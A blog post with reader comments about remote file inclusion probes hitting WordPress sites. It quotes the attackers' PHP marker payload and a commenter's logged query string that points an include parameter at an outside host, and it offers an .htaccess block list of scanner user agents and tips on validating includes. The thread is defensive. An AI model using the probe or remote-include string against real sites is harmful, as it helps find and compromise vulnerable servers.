A few days ago I installed the Bad Behavior plugin for Word Press just as an extra way of combatting spam comments etc. In 2 days it’s blocked 49 attempts by malicious scripts to access this blog. I just looked at the log and most of them are attempts to run a remote PHP script to see if I am running a vulnerable script. The remote scripts are all the same and simply contain
<?php /* Fx29ID */ echo("FeeL".CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
Basically from what I can see there is a bunch of script kiddies who like to call themselves hackers but haven’t got the first clue about real hacking. All they can do is follow step by step instructions they have found on security web sites. A real hacker is a person who actually knows how things work and looks for ways to exploit them so that the makers can make the products more secure.
Had quite a few hits on this one with people searching for information so have decided to add some.
If you are running Word Press then I highly recommend installing the Bad Behavior plugin as this has, to my knowledge, blocked all attempts by these kiddies. I have also added a couple of the banned useragents from Bad Behavior to my sites .htaccess file to prevent them accessing the site all together. It also blocks some known spambots.
SetEnvIfNoCase User-Agent "^libwww-perl*" spammer=yes
SetEnvIfNoCase User-Agent "^Mozilla/5\.0$" spammer=yes
SetEnvIfNoCase User-Agent "^Java/1*" spammer=yes
SetEnvIfNoCase User-Agent "^Java 1*" spammer=yes
SetEnvIfNoCase User-Agent "^<sc" spammer=yes
SetEnvIfNoCase User-Agent "^Jakarta*" spammer=yes
SetEnvIfNoCase User-Agent "^TrackBack*" spammer=yes
SetEnvIfNoCase User-Agent "^USERAGENT$" spammer=yes
SetEnvIfNoCase Via pinappleproxy spammer=yes
SetEnvIfNoCase X-AAAAAAAAAAAA 1 spammer=yes
Deny from env=spammer
Just remember it is also up to you to make sure that any scripts you are running on your site, be they a forum, a blog, a guestbook etc are the latest versions.
BTW if you came here because you found a file containing the FeeL.CoMz text from above then I’m sorry to say your site has already been exploited by this idiots. All you can do is look for other files last updated around the same time to see what else they did. Then make sure your scripts are updated.
I saw similar activity on my logs.
The domain with the remote file was gumansin.com, and the IP address 118.100.71.15.
The sad thing is that it wasn’t some bot like the usual, but some stupid kids browsing my site and then trying to include that to the URL. Googlebot picked up the thing and crawled the links too with 200, so they had a true browser running google’s javascript from my pages.
I did scan the database and everything was fine. Serving cached files can also be useful against dynamic requests.
Regards
[Translate]
I liked Bad Behavior blocking these scripts even earlier than my current stuff does. But Bad Behavior also broke a lot of stuff in WordPress. For instance, scheduled posts no longer worked, because Bad Behavior flagged wp-cron initiated hits.
[Translate]
Yes I have to agree that I feel Bad Behavior can be to strict and doesn’t give you enough control over what it blocks. I mean personally I am happy to accept the Range header. I do feel that it does block the occasional legitimate user. I would like th eoption to be able to enable/diable th evarious checks it does as I feel that only useragent checking and accept header checking are what I need. I have other anti spam stuf in place to deal with spammers.
[Translate]
Script kiddies, hardly even that. They are attempted to run the same script on my site. What makes it even worse it that the muppets are trying to execute this PHP script on my asp.net server. n00bs.
[Translate]
If the vulnerabilty is successfully exploited, that snippet of code would appear on your blog page. From that, the script can tell if you are vulnerable to a particular exploit. Once its found 1000 or so vulnerable sites, suddenly the “script kiddie” has a potentially quite valuable list of vulnerable sites, which he can then sell or use to exploit the sites himself.
[Translate]
I have had this string in a query string (URL ubfuscated with spaces)
(Query): ?sourcedir=http://www . sitecpro . com/files/error??
I have had the attack attempt on several pages (don’t work on my sites anyways, but annoynig with the band width loss)
The code is not much. Apparently, it is only text.
So Should I warn the owner of the site, and maybe Google? I mean is this a threat to others, if they visit the page?
BTW, Usually I would expect this attack to come from several IPs (like what spambots do when they work in groups), but only one was used:
IP 187.35.144.68
[Translate]
Hmmm… I added the code from the stripped page, but it was stripped by your form mail. But it is basically the same as you wrote in the blog.
I am not concerned about my sites, when I see these attempts, but I am concerned about those bastards getting richer because they expand their bot-network by hacking low-secuirty sites they can control. They do not just own a lot of private zoombied PCs via malware, they own servers as well. It is a lot of power they have.
[Translate]
The amount of attacks etc I see coming from exploited sites is ridiculous. Part of the problem is that anyone can make a site and a lot of script writers do not make it clear that the person needs to keep their scripts up to date otherwise their site is at risk.
[Translate]
The attacks probably go on, because they work.
This was also why I thought ‘Why on earth did the programmers of the targeted script make it possible in the first place to remotely include?’
Damn the criminals, but no reason to make it easier for them either. Take away that inclusion (disable it in all scripts possible, and do not use it in the future), and the criminals have to find other ways of attacking.
Maybe I got it wrong?
My own best practice – one of them – is: NOT using anything from query string (or anything the user can control) directly.
Including executable scripts cross domain, not even validating the included file, seems like asking for trouble in that sense.
[Translate]
I have made the error before of not validating my inputs properly and resulted in the ability to include remote files. I quickly patched it and released an update but if people do not keep themselves informed of updates and then perform the updates idiots will abuse them.
[Translate]
Hmm.. I would probably have hardcoded the list of included files, and only allow numeric absolute integers in the query string that didn’t exceed the boundaries of the array.
But there would still be confusion about which files were allowed to be included where, which would make me a bit concerned about this approach in the first place. I do not like this also because it can be bookmarked, and it can be indexed in search engines, which I maybe am not interested in. The logic of the page should be hidden from the user…
I don’t think it is possible either in ASP to include executable script-files that way (via a variable that sets the inde files path/name).
Yeah, I still use the samo hardcoded include style from around 2000. ASP is an extinct language today, I know it
[Translate]